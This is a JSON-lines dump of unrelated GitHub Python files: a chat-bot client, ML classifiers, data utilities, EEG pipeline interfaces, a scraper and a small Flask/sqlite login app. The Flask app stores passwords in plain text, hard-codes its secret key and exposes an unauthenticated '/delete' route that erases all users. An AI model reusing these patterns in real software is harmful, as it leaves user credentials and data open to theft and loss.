self.gate.exec_req(api.User.me())))\n return self._me\n\n @property\n def me(self) -> User:\n \"\"\"\n get client itself corresponding User\n\n RECOMMEND: use ``await fetch_me()``\n\n CAUTION: please call ``await fetch_me()`` first to load data from khl server\n\n designed as 'empty-then-fetch' will break the rule 'net-related is async'\n\n :return: the client's underlying User\n \"\"\"\n if self._me and self._me.is_loaded():\n return self._me\n raise ValueError('not loaded, please call `await fetch_me()` first')\n\n async def fetch_public_channel(self, channel_id: str) -> PublicChannel:\n \"\"\"fetch details of a public channel from khl\"\"\"\n channel_data = await self.gate.exec_req(api.Channel.view(channel_id))\n return public_channel_factory(_gate_=self.gate, **channel_data)\n\n async def fetch_user(self, user_id: str) -> User:\n return User(_gate_=self.gate, _lazy_loaded_=True, **(await self.gate.exec_req(api.User.view(user_id))))\n\n async def delete_channel(self, channel: Union[Channel, str]):\n return await self.gate.exec_req(api.Channel.delete(channel if isinstance(channel, str) else channel.id))\n\n async def list_guild(self) -> List[Guild]:\n \"\"\"list guilds which the client joined\"\"\"\n guilds_data = (await self.gate.exec_pagination_req(api.Guild.list()))\n return [Guild(_gate_=self.gate, _lazy_loaded_=True, **i) for i in guilds_data]\n\n async def list_game(self,\n *,\n begin_page: int = 1,\n end_page: int = None,\n page_size: int = 50,\n sort: str = '') -> List[Game]:\n games = await self.gate.exec_pagination_req(api.game(),\n begin_page=begin_page,\n end_page=end_page,\n page_size=page_size,\n sort=sort)\n return [Game(**game_data) for game_data in games]\n\n async def create_game(self, name, process_name: str, icon: str) -> Game:\n data = {\n 'name': name,\n }\n if process_name is not None:\n data['process_name'] = process_name\n if icon is not None:\n data['icon'] = icon\n game_data = (await self.gate.exec_req(api.Game.create(**data)))\n return Game(**game_data)\n\n async def update_game(self, id: int, name: str, icon: str) -> Game:\n data = {'id': id}\n if name is not None:\n data['name'] = name\n if icon is not None:\n data['icon'] = icon\n game_data = (await self.gate.exec_req(api.Game.update(**data)))\n return Game(**game_data)\n\n async def delete_game(self, game: Union[Game, int]):\n await self.gate.exec_req(api.Game.delete(id=game if isinstance(game, int) else game.id))\n\n async def update_playing_game(self, game: Union[Game, int], data_type: int):\n await self.gate.exec_req(api.Game.activity(id=game if isinstance(game, int) else game.id, data_type=data_type))\n\n async def stop_playing_game(self):\n await self.gate.exec_req(api.Game.deleteActivity())\n\n async def start(self):\n await asyncio.gather(self.handle_pkg(), self.gate.run(self._pkg_queue))\n","repo_name":"xiaozhu2007/HackPig520","sub_path":"venv/lib/python3.8/site-packages/khl/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"6998831690","text":"from domain import metaClass\n\nclass CreateQuoteRequest(metaclass=metaClass.AutoGetSet):\n _attributes = ['sourceCurrency', 'targetCurrency', 'targetAmount', 'sourceAmount', 'profile']\n def __init__(self):\n self._sourceCurrency = None\n self._targetCurrency = None\n self._targetAmount = None\n self._sourceAmount = None\n self._profile = 16727665\n\n \n \n \n \n\n \n \n\n \n ","repo_name":"sandiaaVsivam/wwc","sub_path":"domain/CreateQuoteRequest.py","file_name":"CreateQuoteRequest.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"35185203045","text":"from pypureclient.flashblade import GroupQuota\n\nfile_system_name = \"quotaFs\"\n\n# Add a quota of 1024000 for the file system to apply to the groups with ids 998 and 999\nres = client.post_quotas_groups(file_system_names=[file_system_name], gids=[998, 999],\n quota=GroupQuota(quota=1024000))\n# print the created quotas\nprint(res)\nif type(res) == pypureclient.responses.ValidResponse:\n print(list(res.items))\n\n# Add a quota of 2048000 for the file system to apply to the groups with names group1 and group2\nres = client.post_quotas_groups(file_system_names=[file_system_name],\n group_names=[\"group1\", \"group2\"],\n quota=GroupQuota(quota=2048000))\n# print the created quotas\nprint(res)\nif type(res) == pypureclient.responses.ValidResponse:\n print(list(res.items))\n# Other valid fields: file_system_ids\n# See section \"Common Fields\" for examples\n","repo_name":"PureStorage-OpenConnect/py-pure-client","sub_path":"docs/source/examples/FB2.0/post_quotas_groups.py","file_name":"post_quotas_groups.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"73097977322","text":"# -*-coding:utf-8-*-\n# Project: CH03\n# Filename: perceptron\n# Author: DMAN\n# Dataset: breast cancer\n\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.model_selection import train_test_split\nfrom collections import Counter\nimport numpy as np\nimport heapq\n\n\ndata = load_breast_cancer()\nx = data[\"data\"]\ny = data[\"target\"]\nnumber_features = len(x[0])\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n\n\nclass KNN:\n def __init__(self, data, target, k):\n self.data = data\n self.target = target\n self.k = k\n\n @staticmethod\n def distance(x, y):\n return np.linalg.norm(x - y)\n\n def predict(self, x):\n result = []\n for y, label in zip(self.data, self.target):\n result.append([self.distance(x, y), label])\n most_k = heapq.nsmallest(self.k, result, lambda x: x[0])\n\n labels = Counter(np.array(most_k)[:, 1])\n return int(labels.most_common(1)[0][0])\n\n def test(self, data, target):\n total = 0\n correct = 0\n for x, y in zip(data, target):\n if self.predict(x) == y:\n correct += 1\n total += 1\n return correct / total\n\n\nclass TreeNode:\n def __init__(self, data, target):\n self.data = data\n self.target = target\n self.right = None\n self.left = None\n\n\nclass Kd_Tree:\n def __init__(self, data, target):\n dimension = data.shape[1]\n data = np.concatenate((data, target.reshape(-1, 1)), axis=1)\n sort_dimension = 0\n self.root = self.build(data, dimension, sort_dimension)\n\n def build(self, data, d, k):\n if len(data) == 0:\n return None\n elif len(data) == 1:\n return TreeNode(data[0][:-1], data[0][-1])\n else:\n data = sorted(data, key=lambda x: x[k])\n mid = len(data) // 2\n root = TreeNode(data[mid][:-1], data[mid][-1])\n root.left = self.build(data[:mid], d, (k + 1) % d)\n root.right = self.build(data[mid + 1:], d, (k + 1) % d)\n return root\n\n def MinNode(self, node, data):\n distance = KNN.distance(node.data, data)\n if distance < self.min_distance:\n self.min_distance = distance\n self.min_target = node.target\n\n def find(self, root, d, k, data):\n if root.data[k] < data[k]:\n if root.right != None:\n self.find(root.right, d, (k + 1) % d, data)\n # case a\n self.MinNode(root, data)\n\n # case b\n if root.left != None:\n distance = KNN.distance(root.left.data, data)\n if distance < self.min_distance:\n self.MinNode(root.left, data)\n self.find(root.left, d, (k + 1) % d, data)\n else:\n self.MinNode(root, data)\n\n else:\n if root.left != None:\n self.find(root.left, d, (k + 1) % d, data)\n # case a\n self.MinNode(root, data)\n\n # case b\n if root.right != None:\n distance = KNN.distance(root.right.data, data)\n if distance < self.min_distance:\n self.MinNode(root.right, data)\n self.find(root.right, d, (k + 1) % d, data)\n else:\n self.MinNode(root, data)\n\n def search(self, data):\n self.min_distance = KNN.distance(data, self.root.data)\n self.min_target = self.root.target\n\n # search begin\n self.find(self.root, len(data), 0, data)\n return self.min_target\n\n def test(self, testdata, testtarget):\n total = 0\n correct = 0\n for x, y in zip(testdata, testtarget):\n total += 1\n if self.search(x) == y:\n correct += 1\n return correct / total\n\n\nif __name__ == \"__main__\":\n # model = KNN(x_train, y_train, 7)\n # print(\"Accuracy : {:.2f}%\".format(100 * model.test(x_test, y_test)))\n model = Kd_Tree(x_train, y_train)\n print(\"Accuracy : {:.2f}%\".format(100 * model.test(x_test, y_test)))\n","repo_name":"Dmaner/Statistical-learning-method","sub_path":"Chapter3/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36521554696","text":"\"\"\"\nUtility functions for data methods\n\"\"\"\n\nimport inspect\nfrom typing import Callable\n\n\ndef nested_flatten(data):\n flatten_data = []\n\n def _nested_flatten(data):\n if type(data) is dict:\n for key in data:\n _nested_flatten(data[key])\n elif type(data) is tuple:\n for el in data:\n _nested_flatten(el)\n else:\n flatten_data.append(data)\n\n _nested_flatten(data)\n return flatten_data\n\n\ndef renest_flat(shape_data, flat_data):\n def _renester(data):\n if type(data) is dict:\n res = {}\n for key in data:\n res[key] = _renester(data[key])\n return res\n elif type(data) is tuple:\n res = []\n for el in data:\n res.append(_renester(el))\n return tuple(res)\n else:\n return flat_data.pop(0)\n\n res = _renester(shape_data)\n\n return res\n\n\ndef nested_apply(data, func_lambda, *func_args, **func_kwargs):\n flattened_data = nested_flatten(data)\n flattened_data = list(map(\n lambda el: func_lambda(el, *func_args, **func_kwargs),\n flattened_data))\n return renest_flat(data, flattened_data)\n\n\ndef nestize(f, *func_args, **func_kwargs):\n return lambda el: nested_apply(el, f, *func_args, **func_kwargs)\n\n\ndef nested_slice(data, slicer):\n def _slicer(el):\n return el[slicer]\n return nested_apply(data, _slicer)\n\n\ndef get_data_batch_size(full_data=None, flat_data=None):\n if full_data is None and flat_data is None:\n raise ValueError(\n \"At least one of full_data or flat_data needs not be None.\")\n if full_data is not None and flat_data is not None:\n raise ValueError(\"Can't specify both full_data and flat_data.\")\n if full_data is not None:\n flat_data = nested_flatten(full_data)\n lengths = set(map(lambda el: len(el), flat_data))\n if len(lengths) > 1:\n raise ValueError(f\"Inconsistent element sizes: {lengths}\")\n return lengths.pop()\n\n\ndef nested_batcher(data_gen, batch_size, stack_method, drop_remainder=True):\n it = iter(data_gen())\n while True:\n flat_batch_data = None\n flat_batch_shape = None\n num_collected = 0\n try:\n # Fill up batches\n while True:\n el = next(it)\n el_flat = nested_flatten(el)\n if flat_batch_data is None:\n flat_batch_shape = el\n flat_batch_data = list(\n map(lambda e: list(),\n el_flat))\n for i in range(len(el_flat)):\n flat_batch_data[i].append(el_flat[i])\n num_collected += 1\n if num_collected >= batch_size:\n break\n except StopIteration:\n # Catch stop iteration for partial batches\n pass\n if drop_remainder and num_collected != batch_size:\n # Exit now and don't yield\n break\n # if we have a non-empty batch, yield it.\n if flat_batch_data is not None and \\\n len(flat_batch_data) > 0:\n flat_batch_data = list(map(\n stack_method,\n flat_batch_data))\n yield renest_flat(\n flat_batch_shape,\n flat_batch_data)\n else:\n break\n\n\ndef nested_unbatcher(data_gen):\n it = iter(data_gen())\n while True:\n try:\n d = next(it)\n except StopIteration:\n return\n flat_d = nested_flatten(d)\n length = get_data_batch_size(flat_data=flat_d)\n for i in range(length):\n new_d = list(map(lambda el: el[i], flat_d))\n yield renest_flat(d, new_d)\n\n\ndef taker(gen_func, n):\n i = 0\n it = iter(gen_func())\n while i < n:\n try:\n yield next(it)\n i += 1\n except StopIteration:\n return\n return\n\n\ndef skiper(gen_func, n):\n i = 0\n it = iter(gen_func())\n while i < n:\n try:\n next(it)\n i += 1\n except StopIteration:\n return\n while True:\n try:\n yield next(it)\n except StopIteration:\n return\n\n\ndef function_inspection(func: Callable):\n if not callable(func):\n raise ValueError(\"Argument should be a function.\")\n\n sig = inspect.signature(func)\n params = sig.parameters\n\n explicit_args = 0\n var_args = False\n keyword_args = 0\n var_kwargs = False\n\n for _, param in params.items():\n if param.kind == param.POSITIONAL_OR_KEYWORD:\n if param.default == inspect.Parameter.empty:\n explicit_args += 1\n else:\n keyword_args += 1\n elif param.kind == param.VAR_POSITIONAL:\n var_args = True\n elif param.kind == param.VAR_KEYWORD:\n var_kwargs = True\n\n return {\n 'signature': sig,\n 'n_args': explicit_args,\n 'var_args': var_args,\n 'n_kwargs': keyword_args,\n 'var_kwargs': var_kwargs,\n }\n\n\ndef promote_function(func):\n def promoted_func(x, y, *args, **kwargs):\n return func(x, *args, **kwargs), \\\n func(y, *args, **kwargs)\n return promoted_func\n\n\ndef func_source_extract(func):\n # Get source code for a given function,\n # and format it in a consistent way for\n # building custom transformations.\n #\n # Args:\n # func: The function whose source to extract.\n\n # Get the source code\n code_string = inspect.getsource(func)\n\n # Possibly strip leading spaces\n code_lines = code_string.split('\\n')\n\n init_strip = code_lines[0]\n\n for line in code_lines[1:]:\n i = 0\n while i < len(init_strip) and \\\n i < len(line) and \\\n init_strip[i] == line[i]:\n i += 1\n if i == len(init_strip) or \\\n i == len(line):\n continue\n\n init_strip = init_strip[:i]\n\n if len(init_strip) > 0:\n code_lines = list(map(\n lambda line: line[len(init_strip):],\n code_lines))\n\n return '\\n'.join(code_lines)\n","repo_name":"ncsa/DRYML","sub_path":"src/dryml/data/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"72169108843","text":"# output_typing.py\n# Handles output classes and prints\n#\n# ICS 32 Spring 2017\n# Gerald Berzuela\n\n\nimport MapQuest_API\n\n\nclass steps:\n def print_steps(json_response: 'json') -> None:\n ''' Iterates through the JSON dictionary to find and print the steps '''\n try:\n print('\\nDIRECTIONS')\n for items in json_response['route']['legs']: \n for obj in items['maneuvers']: \n print(obj['narrative'])\n\n except KeyError:\n print('NO ROUTE FOUND')\n\n\nclass totaldistance:\n def print_distance(json_response: 'json') -> None:\n ''' Simply prints the total distance of the journey '''\n try:\n print('\\nTOTAL DISTANCE: ', end = '')\n print(str(round(json_response['route']['distance'])) + ' miles')\n\n except KeyError:\n print('NO ROUTE FOUND')\n\n\nclass totaltime:\n def print_time(json_response: 'json') -> None:\n '''\n Finds the total time which I saw to be in seconds,\n used integer division to convert to minutes\n '''\n try:\n print('\\nTOTAL TIME: ', end = '')\n print(str(json_response['route']['time'] // 60) + ' minutes')\n\n except KeyError:\n print('NO ROUTE FOUND')\n\n\nclass latlong:\n def print_latlong(json_response: 'json') -> None:\n '''\n Finds lat and long withing the JSON response\n and formats to two decimal places\n '''\n try:\n print('\\nLATLONGS')\n for items in json_response['route']['locations']:\n \n lat = float('{0:.2f}'.format(items['latLng']['lat']))\n lng = float('{0:.2f}'.format(items['latLng']['lng']))\n\n '''\n Checks to see if lat ot long is negative\n Gets absolute value and returns a string with\n correct cardinal direction\n '''\n if lat < 0 :\n lat = str(abs(lat)) + ' S'\n else:\n lat = str(lat) + ' N'\n \n if lng < 0:\n lng = str(abs(lng)) + ' W'\n else:\n lng = str(lng) + ' E'\n \n print(lat + ' ' + lng )\n\n except KeyError:\n print('NO ROUTE FOUND')\n \n\nclass elevation:\n def print_elevation(json_response: 'json') -> None:\n '''\n This function stores the latlongs of each location into a nested list\n It then sends each latlong to build the elevation URL and prints\n elevation individually.\n '''\n latlng = []\n \n try:\n for items in json_response['route']['locations']:\n latlng.append([items['latLng']['lat'], items['latLng']['lng']])\n\n print('\\nELEVATIONS')\n for i in range(len(latlng)):\n elevation_URL = MapQuest_API.build_elevation_URL(latlng[i])\n elevation_json = MapQuest_API.build_response(elevation_URL)\n\n for items in elevation_json['elevationProfile']:\n print(str(round(items['height'] * 3.28)))\n \n except KeyError:\n print('NO ROUTE FOUND')\n \n","repo_name":"gberzuela/College-Assignments","sub_path":"ICS32/Project 3_MapQuest/output_typing.py","file_name":"output_typing.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15682694906","text":"import numpy as np\nfrom pylab import *\nimport random\n\nN=7000\nM=95\n\npre_throughput=np.loadtxt('allData/throughput.txt')\n#print(len(pre_throughput))\nspeed =np.loadtxt('allData/speed.txt')\ndistance =np.loadtxt('allData/distance1.txt')\nacce=np.loadtxt('allData/acce.txt')\n\n#缩小\nthroughput=np.zeros([M,50])\nfor i in range(len(throughput)):\n min_data=np.min(pre_throughput[i])\n max_data=np.max(pre_throughput[i])\n for j in range(len(throughput[0])):\n throughput[i][j]=2*pre_throughput[i][j]/(max_data-min_data)+(0.5*max_data-2.5*min_data)/(max_data-min_data)\n\n\ntrain_throughput=np.zeros([N,50])\ntrain_speed=np.zeros([N,50])\ntrain_distance=np.zeros([N,50])\ntrain_acce=np.zeros([N,50])\n\nfor i in range(len(train_throughput)):\n train_throughput[i]=throughput[i%M]\n train_speed[i]=speed[i%M]\n train_distance[i]=distance[i%M]\n train_acce[i] =acce[i%M]","repo_name":"yuwangwhu/Neural-ABR-Video-Streaming-for-UAV","sub_path":"LoadDatabefore.py","file_name":"LoadDatabefore.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"30101355827","text":"# Напишите программу, которая определит позицию второго \r\n# вхождения строки в списке либо сообщит, что ее нет\r\n\r\n\r\n\r\nmy_list = [\"123\",\"qwe\",\"23414\",\"asdfaddsd\",\"123\"]\r\nnum=(input(\"введите значение: \"))\r\nflag = -1\r\nfor i in range(len(my_list)):\r\n if (my_list[i]==num):\r\n flag+=1\r\n if flag==1:\r\n print (i)\r\n break\r\nelse:\r\n print(-1)\r\n\r\n\r\n# my_list = [\"123\",\"qwe\",\"23414\",\"asdfaddsd\",\"123\"]\r\n# num=(input(\"введите значение: \"))\r\n# list1=[i for i,num in enumerate(my_list)]\r\n# if len(list1)>1:\r\n# print(list1[1])\r\n# else:\r\n# print(-1)\r\n","repo_name":"allcabar88/Python","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17958308474","text":"import os\nimport pickle\n\nimport nibabel\nimport numpy as np\nfrom nipype.interfaces import io as nio\nfrom nipype.interfaces.base import (\n BaseInterface, BaseInterfaceInputSpec,\n TraitedSpec, traits\n)\n\nfrom cmtklib.interfaces import pycartool as cart\n\n\nclass CreateRoisInputSpec(BaseInterfaceInputSpec):\n subject = traits.Str(desc=\"subject\", mandatory=True)\n\n bids_dir = traits.Str(desc=\"base directory\", mandatory=True)\n\n parcellation = traits.Str(desc=\"parcellation scheme\", mandatory=True)\n\n cartool_dir = traits.Str(desc=\"Cartool directory\", mandatory=True)\n\n cmp3_dir = traits.Str(desc=\"CMP3 directory\", mandatory=True)\n\n output_query = traits.Dict(desc=\"BIDSDataGrabber output_query\", mandatory=True)\n\n derivative_list = traits.List(exists=True, desc=\"List of derivatives to add to the datagrabber\", mandatory=True)\n\n\nclass CreateRoisOutputSpec(TraitedSpec):\n output_query = traits.Dict(desc=\"BIDSDataGrabber output_query\", mandatory=True)\n\n derivative_list = traits.List(exists=True, desc=\"List of derivatives to add to the datagrabber\", mandatory=True)\n\n\nclass CreateRois(BaseInterface):\n \"\"\"Create Cartool-reconstructed sources / parcellation ROI mapping files.\n\n Examples\n --------\n >>> from cmtklib.interfaces.eeg import CreateRois\n >>> createrois = CreateRois()\n >>> createrois.inputs.subject = 'sub-01'\n >>> createrois.inputs.bids_dir = '/path/to/bids_dataset'\n >>> createrois.inputs.parcellation = {'label':'L2008', 'desc':'scale1'}\n >>> createrois.inputs.cartool_dir = 'Cartool-v3.80'\n >>> createrois.inputs.cmp3_dir = 'cmp-v3.0.3'\n >>> createrois.inputs.output_query = {}\n >>> createrois.inputs.derivative_list = []\n >>> createrois.run() # doctest: +SKIP\n\n \"\"\"\n\n input_spec = CreateRoisInputSpec\n output_spec = CreateRoisOutputSpec\n\n def _run_interface(self, runtime):\n subject = self.inputs.subject\n parcellation_image_path = self.inputs.parcellation\n parcellation_name = parcellation_image_path.split(\"/\")[-1].split(\".\")[0]\n cartool_dir = os.path.join(self.inputs.bids_dir, \"derivatives\", self.inputs.cartool_dir)\n cmp3_dir = os.path.join(self.inputs.bids_dir, \"derivatives\", self.inputs.cmp3_dir)\n self.derivative_list = self.inputs.derivative_list\n self.output_query = self.inputs.output_query\n\n self._create_roi_files(subject, parcellation_image_path, parcellation_name, cartool_dir, cmp3_dir)\n\n self.derivative_list.append(self.inputs.cartool_dir)\n\n self.output_query[\"rois\"] = {\n # 'scope': 'cartool-v3.80',\n \"extension\": [\"pickle.rois\"]\n }\n self.output_query[\"src\"] = {\n # 'scope': 'cartool-v3.80',\n \"extension\": [\"spi\"]\n }\n self.output_query[\"invsol\"] = {\n # 'scope': 'cartool-v3.80',\n \"extension\": [\"LAURA.is\"]\n }\n\n return runtime\n\n @staticmethod\n def _create_roi_files(subject, parcellation, parcellation_name, cartool_dir, cmp3_dir):\n spipath = os.path.join(cartool_dir, subject, \"eeg\", subject + \"_eeg.spi\")\n source = cart.source_space.read_spi(spipath)\n\n impath = os.path.join(parcellation)\n im = nibabel.load(impath)\n imdata = im.get_fdata()\n x, y, z = np.where(imdata)\n center_brain = [np.mean(x), np.mean(y), np.mean(z)]\n source.coordinates[:, 0] = -source.coordinates[:, 0]\n source.coordinates = source.coordinates - source.coordinates.mean(0) + center_brain\n\n xyz = source.get_coordinates()\n xyz = np.round(xyz).astype(int)\n num_spi = len(xyz)\n\n # label positions\n rois_file = np.zeros(num_spi)\n x_roi, y_roi, z_roi = np.where((imdata > 0) & (imdata < np.unique(imdata)[-1]))\n\n # For each coordinate\n for spi_id, spi in enumerate(xyz):\n distances = ((spi.reshape(-1, 1) - [x_roi, y_roi, z_roi]) ** 2).sum(0)\n roi_id = np.argmin(distances)\n rois_file[spi_id] = imdata[x_roi[roi_id], y_roi[roi_id], z_roi[roi_id]]\n\n groups_of_indexes = [np.where(rois_file == roi)[0].tolist() for roi in np.unique(rois_file)]\n names = [str(int(i)) for i in np.unique(rois_file) if i != 0]\n\n rois_file_new = cart.regions_of_interest.RegionsOfInterest(\n names=names, groups_of_indexes=groups_of_indexes, source_space=source\n )\n\n rois_dir = os.path.join(cartool_dir, subject, \"eeg\", \"Rois\")\n if not os.path.isdir(rois_dir):\n os.mkdir(rois_dir)\n filename_pkl = os.path.join(rois_dir, parcellation_name + \".pickle.rois\")\n filehandler = open(filename_pkl, \"wb\")\n pickle.dump(rois_file_new, filehandler)\n filehandler.close()\n\n def _list_outputs(self):\n outputs = self._outputs().get()\n outputs[\"output_query\"] = self.output_query\n outputs[\"derivative_list\"] = self.derivative_list\n return outputs\n\n\nclass EEGLoaderInputSpec(BaseInterfaceInputSpec):\n base_directory = traits.Directory(exists=True, desc=\"BIDS data directory\", mandatory=True)\n\n subject = traits.Str(desc=\"subject\", mandatory=True)\n\n invsol_format = traits.Enum(\"Cartool-LAURA\", \"Cartool-LORETA\", \"mne-sLORETA\", desc=\"Cartool vs mne\")\n\n output_query = traits.Dict(desc=\"output query for BIDSDataGrabber\", mandatory=True)\n\n derivative_list = traits.List(exists=True, desc=\"List of derivatives to add to the datagrabber\", mandatory=True)\n\n verbose_mode = traits.Bool(False, desc=\"Print extra information\")\n\n\nclass EEGLoaderOutputSpec(TraitedSpec):\n EEG = traits.List(exists=True, desc=\"eeg * epochs in .fif format\", mandatory=True)\n src = traits.List(\n exists=True, desc=\"src (spi loaded with pycartool or source space created with MNE)\", mandatory=True\n )\n invsol = traits.List(exists=True, desc=\"Inverse solution (.is file loaded with pycartool)\", mandatory=False)\n rois = traits.List(exists=True, desc=\"parcellation scheme\", mandatory=True)\n bem = traits.List(exists=True, desc=\"boundary surfaces for MNE head model\", mandatory=False)\n\n\nclass EEGLoader(BaseInterface):\n \"\"\"Create Cartool-reconstructed sources / parcellation ROI mapping files.\n\n Examples\n --------\n >>> from cmtklib.interfaces.eeg import EEGLoader\n >>> eeg_loader = EEGLoader()\n >>> eeg_loader.inputs.base_directory = '/path/to/bids_dataset'\n >>> eeg_loader.inputs.subject = 'sub-01'\n >>> eeg_loader.inputs.invsol_format = 'Cartool-LAURA'\n >>> eeg_loader.inputs.output_query = {\n ... \"rois\" : {\"extension\": [\"pickle.rois\"]},\n ... \"src\" : {\"extension\": [\"spi\"]},\n ... \"invsol\" = {\"extension\": [\"LAURA.is\"]}\n ... }\n >>> eeg_loader.inputs.derivative_list = ['/path/to/cartool/derivatives']\n >>> eeg_loader.run() # doctest: +SKIP\n\n \"\"\"\n input_spec = EEGLoaderInputSpec\n output_spec = EEGLoaderOutputSpec\n\n def _run_interface(self, runtime):\n self.base_directory = self.inputs.base_directory\n self.subject = self.inputs.subject\n self.derivative_list = self.inputs.derivative_list\n self._run_datagrabber()\n return runtime\n\n def _run_datagrabber(self):\n bidsdatagrabber = nio.BIDSDataGrabber(\n index_derivatives=False,\n extra_derivatives=[os.path.join(self.base_directory, \"derivatives\", elem)\n for elem in self.derivative_list],\n )\n bidsdatagrabber.inputs.base_dir = self.base_directory\n bidsdatagrabber.inputs.subject = self.subject.split(\"-\")[1]\n bidsdatagrabber.inputs.output_query = self.inputs.output_query\n if self.inputs.verbose_mode:\n print(bidsdatagrabber.inputs.output_query)\n print(bidsdatagrabber.inputs.base_dir)\n print(bidsdatagrabber.inputs.subject)\n self.results = bidsdatagrabber.run()\n\n def _list_outputs(self):\n outputs = self._outputs().get()\n for key, value in self.results.outputs.get().items():\n outputs[key] = value\n return outputs\n","repo_name":"SergeDmi/connectomemapper3","sub_path":"cmtklib/interfaces/eeg.py","file_name":"eeg.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"15652784787","text":"from flask import Flask, render_template,url_for,request,session,redirect\nimport sqlite3 \nfrom prettytable import PrettyTable\napp = Flask(__name__,static_folder='./templates/')\napp.secret_key = 'itissecectkey'\n@app.route('/')\ndef home():\n return render_template('index.html')\n@app.route('/delete',methods = [\"POST\",\"GET\"])\ndef delete():\n conn = sqlite3.connect(\"database.db\") \n cur = conn.cursor()\n cur.execute(\"DELETE from user\")\n conn.commit()\n return render_template('index.html')\n\n@app.route('/register')\ndef register():\n return render_template('register.html')\n\n@app.route('/addrec',methods = [\"POST\",\"GET\"])\ndef addrec():\n if request.method == \"POST\":\n try :\n ID = request.form[\"username\"]\n sec = request.form[\"password\"]\n\n\n with sqlite3.connect(\"database.db\") as conn:\n cur= conn.cursor()\n cur.execute(\"INSERT INTO user (ID,num,eschar,slough,granulation) VALUES (?,?,?,?,?)\", (ID,sec,0,0,0))\n conn.commit()\n msg = \"successfully add\"\n except:\n conn.rollback()\n msg = \"error in insert\"\n finally:\n conn.close()\n return render_template(\"result.html\",msg=msg)\n \n\n@app.route('/login',methods = [\"POST\",\"GET\"])\ndef login():\n msg = ''\n if request.method == 'POST' and 'username' in request.form and 'password' in request.form:\n ID = request.form[\"username\"]\n sec = request.form[\"password\"]\n print(ID,sec)\n\n conn = sqlite3.connect(\"database.db\") \n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n cur.execute('SELECT * FROM user WHERE ID = ? AND num = ?',(ID,sec))\n\n acc = cur.fetchone()\n if acc:\n session['loggedin'] = True\n session['id'] = acc['ID']\n session['sec'] = acc['num']\n msg = 'logged in successfully'\n print(\"acc\", acc['ID'])\n return redirect('/analysis')\n # return render_template('analysis.html',msg=acc['num'])\n else:\n msg = 'incorrect id / password'\n # msg = rows\n return render_template('login.html',msg = msg) \n \n@app.route('/logout')\ndef logout():\n session.pop('loggedin', None)\n session.pop('id', None)\n session.pop('sec', None)\n return redirect(url_for('login'))\n\n\n@app.route('/list')\ndef list():\n conn = sqlite3.connect(\"database.db\") \n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n cur.execute(\"select * from user\")\n rows = cur.fetchall()\n \n return render_template('list.html',rows=rows)\n@app.route('/analysis', methods=['GET', 'POST'])\ndef result():\n selected_date = \"NA\"\n if request.method == 'POST':\n selected_date = request.form['date']\n value = session['id'] \n n = 0.6\n s = 8\n g = 3\n conn = sqlite3.connect('database.db')\n cursor = conn.cursor()\n\n query = \"UPDATE user SET eschar =?, slough=?,granulation=? WHERE id = ?\"\n cursor.execute(query,(n,s,g,value))\n conn.commit()\n # conn.close()\n # query = \"SELECT * FROM user\"\n # cursor.execute(query)\n # rows = cursor.fetchall()\n # for row in rows:\n # print(row[0])\n # print(row[1])\n # print(row[2])\n # print(rows)\n cursor.close()\n conn.close()\n\n return render_template(\"analysis.html\",value = value,date=selected_date)\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"luacy200820/Flask_web","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20548977699","text":"from datetime import datetime\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef get_transcripts_detailes(url):\r\n response = requests.get(url)\r\n if response.ok:\r\n \r\n soup = BeautifulSoup(response.text)\r\n else: \r\n raise Exception(f'response is {response}')\r\n \r\n try:\r\n title = soup.find('h1', {'class': 'font-medium'}).text\r\n except:\r\n title = ''\r\n try:\r\n ticker = soup.find('a', {'class': 'ticker-symbol'}).text\r\n except:\r\n ticker = ''\r\n try:\r\n content = soup.find('div', {'class': 'tailwind-article-body'}).text\r\n except:\r\n content\r\n try:\r\n date = soup.find('span', {'id': 'date'}).text\r\n except:\r\n date = ''\r\n try:\r\n market_cap = soup.find('div', {'class': 'font-bold text-right text-gray-1100'}).text\r\n except:\r\n market_cap = ''\r\n try:\r\n today_change = soup.find('div', {'class': 'w-full text-lg font-medium bg-red-200 p-8px text-gray-1100'}).text\r\n except:\r\n today_change = ''\r\n try:\r\n current_price = soup.find('div', {'class': 'text-sm font-medium lg:text-right lg:pl-8px text-gray-1100 p-8px lg:text-lg'}).text\r\n except:\r\n current_price = ''\r\n \r\n detail_transcripts_dict = {\r\n 'ticker': ticker,\r\n 'title': title,\r\n 'date': date,\r\n 'crawled_date':datetime.today(),\r\n 'market_cap': market_cap,\r\n 'current_price': current_price,\r\n 'today_change': today_change,\r\n 'link':url,\r\n 'content': content,\r\n }\r\n return detail_transcripts_dict\r\n\r\n\r\nif __name__ == \"__main__\":\r\n dict_ = 